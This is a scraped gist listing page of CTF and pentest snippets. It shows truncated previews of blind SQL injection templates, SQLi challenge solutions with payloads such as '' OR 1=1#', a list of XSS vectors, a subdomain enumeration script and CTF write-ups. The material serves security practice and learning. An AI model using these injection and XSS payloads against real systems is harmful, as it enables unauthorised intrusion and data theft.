@abdilahrf
abdilahrf / legcountersolve.py
Last active Oct 3, 2019
Leg counter web challenges solver (Blind SQLi Template)
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
url = "http://103.56.207.107:50001/upload.php"
payload = {
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Run unicornscan from the CLI, and run nmap from inside msfconsole so its results are stored in the database as loot.

@abdilahrf
abdilahrf / web-servers.md
Created Mar 10, 2018 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@abdilahrf
abdilahrf / blind_sqlinjection.py
Last active Dec 8, 2020
Blind SQL injection Template
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
"username":"",
"password":"x",
}
def check(data):
@abdilahrf
abdilahrf / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@abdilahrf
abdilahrf / sqli-mezzanie-owaspctf.py
Created Sep 23, 2017
Solution for sqli level 1-6 except 5
import requests
import re
#GLOBAL
base_url = "http://mezzanine.mysterious-hashes.net/"
format_flag = "flag{%s}"
#LEVEL 1
payload = {
"user": "' OR 1=1#",
"pass": "' OR 1=1#"
@abdilahrf
abdilahrf / crt.sh
Created Sep 13, 2017 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@abdilahrf
abdilahrf / gist:65bb60222cae8c2158004dbde27857ae
Created Jun 1, 2017
Codegate 2014 CTF, web "120" write-up

Task

You are given a URI (everything happens under the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php. The same path ending in index.phps is allegedly the source code of the former. Finally, index.php contains a link to auth.php.

index.phps listing below:

<?php
session_start();

$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);
@abdilahrf
abdilahrf / rcdn_solution.py
Created May 23, 2017 — forked from rkmylo/rcdn_solution.py
RCTF 2017 - rCDN Solution
# coding: utf-8
"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""
import re
import sys
import string
import requests
@abdilahrf
abdilahrf / rfile_solution.py
Created May 23, 2017 — forked from rkmylo/rfile_solution.py
RCTF 2017 - rFile Solution
from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta
api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'
def totimestamp(dt, epoch=datetime(1970,1,1)):
    # Seconds since the Unix epoch as a float (true division via __future__ import above)
    td = dt - epoch
    return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6